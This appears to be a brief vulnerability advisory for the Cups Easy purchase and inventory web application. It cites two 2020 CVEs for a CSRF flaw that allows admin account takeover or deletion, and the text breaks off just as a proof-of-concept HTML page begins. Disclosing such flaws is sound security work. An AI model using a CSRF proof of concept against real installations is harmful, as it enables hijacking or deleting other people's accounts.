The Cups Easy (Purchase & Inventory) Web Appliction is vulnerable to CSRF that leads to admin (or arbitrary) account takeover or deletion
CVE 2020-8425
CVE 2020-8424
Source for the Application: sourceforgenet/projects/cupseasy/files/cupseasylive-10/
Proof of Concept code to initiate the Password Change:
<html>
<body>
<s